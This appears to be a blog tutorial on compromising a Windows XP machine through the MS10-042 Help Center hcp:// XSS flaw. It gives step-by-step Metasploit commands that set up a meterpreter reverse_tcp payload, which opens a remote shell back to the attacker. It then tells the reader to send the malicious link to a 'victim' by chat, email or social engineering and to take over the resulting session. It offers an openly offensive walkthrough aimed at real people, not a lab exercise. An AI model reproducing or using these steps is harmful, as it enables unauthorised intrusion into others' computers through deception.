Hack Remote PC using Microsoft Help Center XSS

Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme “hcp”. Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to “none” or “player”

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec

Msf exploit (ms10_042_helpctr_xss_cmd_exec)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_042_helpctr_xss_cmd_exec)>set lhost (IP of Local Host)

Msf exploit (ms10_042_helpctr_xss_cmd_exec)>set srvhost (This must be an address on the local machine)

Msf exploit (ms10_042_helpctr_xss_cmd_exec)>set srvport 80 (port of local host)

Msf exploit (ms10_042_helpctr_xss_cmd_exec)>set uripath / (The Url to use for this exploit)

Msf exploit (ms10_042_helpctr_xss_cmd_exec)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *